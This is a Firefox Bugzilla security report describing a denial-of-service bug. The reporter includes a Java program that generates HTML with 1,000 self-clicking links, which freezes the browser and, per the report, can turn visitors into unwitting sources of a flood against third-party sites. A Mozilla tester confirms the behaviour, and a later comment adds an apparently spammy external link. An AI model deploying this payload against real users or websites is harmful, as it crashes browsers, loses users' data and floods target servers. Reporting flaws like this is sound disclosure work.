Open Bug 1311306 Opened 5 years ago Updated 2 years ago

DDOS target website on Clicking a single link of distributed malicious HTML in Firefox

Categories

(Firefox :: Security, defect, P5)

49 Branch
defect

Tracking

()

People

(Reporter: cs.anurag.jain, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, Whiteboard: dupe me)

Attachments

(3 files)

40.50 KB, application/zip
Details
17.19 KB, text/html
Details
9.85 KB, image/png
Details
Attached file firefox.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36

Steps to reproduce:

1) Unextract firefox.zip & Open a.html
2) Your browser will freeze and in background your memory will keep on increasing.
3) I am using windows10, in my case mozilla memory increased upto 2.5 GB and the windows terminated mozilla firefox. 
4) This made user to loss all his data in other tabs. Crash Screenshot in zip file

Short summary of attached file:
We created multiple origin points for recursive calls using javascript in body onload. 
In this we made 1000 origin points so we made like 1000! calls from single tab which freeze entire firefox and eventually crashed it.
The impact will increase on increasing the origin points.

Creating the payload:
Sample Java Program to create the payload (Copy the output in html file and open the html file to see the exploit):
	public static void linkGenerator()
	{
		System.out.print("<body onload=\"");
		for(int j=0;j<1000;j++){
			System.out.print("document.getElementById('myLink"+j+"').click();");	
		}
		System.out.print("\">");
		System.out.println("\n<a id=\"myLink\" onclick=\"document.getElementById('myLink0').click();\" href=\"http://fb.com\">Click Me</a>");
		for(int i=0;i<1000;i++)
		{
		String html="<a id=\"myLink"+i+"\" onclick=\"document.getElementById('myLink"+(i+1)+"').click();\" href=\"http://twitter.com\"><script></script>Click Me</a>";
		System.out.println(html);
		}
	}


Actual results:

Firefox will crash when a user visit a website with attached html.
In my case (windows 10) it crashed after mozilla consumed 2.5GB of memory. 
Not sure how other operating system would behave when memory keeps on increasing exponentially.


Expected results:

If a tab is consuming too much memory and cpu then firefox must either kill it or show a user friendly message (I see that message on videos or ambiguious js but in mine case it did not come)
Group: firefox-core-security
Attached file a.html
Just realized we can also use the above loophole to cause DDOS on any third party websites. Attached script will open twitter1...twitter99 on one single user click. Scary part is User will not see twitter1..twitter98 so he would never realize that his network is sending several request to twitter. This attack intensity would increase as more people click on the link.

The above script will show you twitter5.com in the last since i placed a confirm box on twitter4.com a onclick. So an attacker can define the endpoint by simply using an alert or confirm box.

Now since we can use this to attack other website, so can we consider this as valid security bug.
Summary: Client Browser Denial of Service → DDOS target website on Clicking a single link of distributed malicious HTML in Firefox
Attached image memory.png
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 
Build ID: 20161019084923

Hi Anurag,

I have tested your issue on latest FF release (49.0.1) and latest Nightly (Build ID: 20161024030205) and reproduced it.
Using the html attachment from Firefox.zip, the memory increased up to 4.4 GB (please see attachment) , Firefox just freezed,without crashing.

At first glance this issue could start in Security component.
Component: Untriaged → Security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Thanks roxana for the check :)
The part I am much scared is becoming a part of a DDOS attack by just clicking on the link as shown in a.html (Simply posting a viral post with infected link on facebook can initiate a serious chain of attack to the targeted website)
Chrome also has the problem of freeze but somehow it manages to send only one link on the network and cancel the rest several calls thus saving the user from becoming a ddos node. Just a suggestion, It would be great if we could use similar strategy along with saving victim resources.
Hi,
Any update on this issue?
Thanks
Blocks: eviltraps
Keywords: csectype-dos
Priority: -- → P5
Whiteboard: dupe me
Flags: sec-bounty-
Hi, I have tested this issue on newest FF release. After the update, from Firefox.zip, the memory increased up to 4.4 GB, Firefox just freezed,without crashing. Didn't understand what is going on. Later I found this: https://reviewedbypro.com/what-is-critical-firefox-update-and-how-to-remove-it/ Be carefull
You need to log in before you can comment on or make changes to this bug.